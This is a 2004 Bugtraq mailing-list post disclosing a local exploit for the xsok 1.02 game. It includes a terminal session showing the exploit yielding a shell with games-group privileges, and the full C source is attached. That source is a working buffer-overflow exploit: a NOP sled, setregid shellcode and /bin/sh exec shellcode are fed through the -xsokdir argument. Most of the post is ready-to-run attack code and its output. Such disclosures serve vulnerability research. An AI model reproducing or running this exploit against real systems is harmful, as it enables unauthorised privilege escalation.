[32991] in bugtraq
xsok local games exploit (2)
daemon@ATHENA.MIT.EDU (c0wboy@0x333)
Mon Jan 5 14:04:15 2004
Message-ID: <002901c3d1f0$31b4e200$42be5452@c0wboy>
From: "c0wboy@0x333" <c0wboy@tiscali.it>
To: <bugtraq@securityfocus.com>
Date: Sat, 3 Jan 2004 12:53:19 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0026_01C3D1F8.903B3600"
------=_NextPart_000_0026_01C3D1F8.903B3600
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
[c0wboy@0x333 c0wboy]$ gcc "0x333xsok(2).c" -o exp_2
[c0wboy@0x333 c0wboy]$ ./exp_2
--- 0x333xsok => xsok 1.02 local games exploit ---
--- Outsiders Se(c)urity Labs 2003 ---
sh-2.05b$ id
uid=500(c0wboy) gid=20(games) groups=500(c0wboy)
sh-2.05b$ exit
exit
[c0wboy@0x333 c0wboy]$
sorry but too alcool is still in my mind :P
------=_NextPart_000_0026_01C3D1F8.903B3600
Content-Type: application/octet-stream;
name="0x333xsok(2).c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="0x333xsok(2).c"
/* 0x333xsok (2) =3D> xsok 1.02 local game exploit
*
* Happy new year ! (2 :)
* coded by c0wboy=20
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <unistd.h>
#define BIN "/usr/games/xsok"
#define RETADD 0xbffffa3c
#define SIZE 200
unsigned char shellcode[] =3D
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
=09
int main (int argc, char ** argv)
{
int i, ret =3D RETADD;
char out[SIZE];
fprintf(stdout, "\n --- 0x333xsok =3D> xsok 1.02 local games exploit =
---\n");
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 =
---\n\n");
int *xsok =3D (int *)(out);
for (i=3D0; i<SIZE-1 ; i+=3D4, *xsok++ =3D ret);
memset((char *)out, 0x90, 63);
memcpy((char *)out+63, shellcode, strlen(shellcode));
execl (BIN, BIN, "-xsokdir", out, 0x0);
}
------=_NextPart_000_0026_01C3D1F8.903B3600--
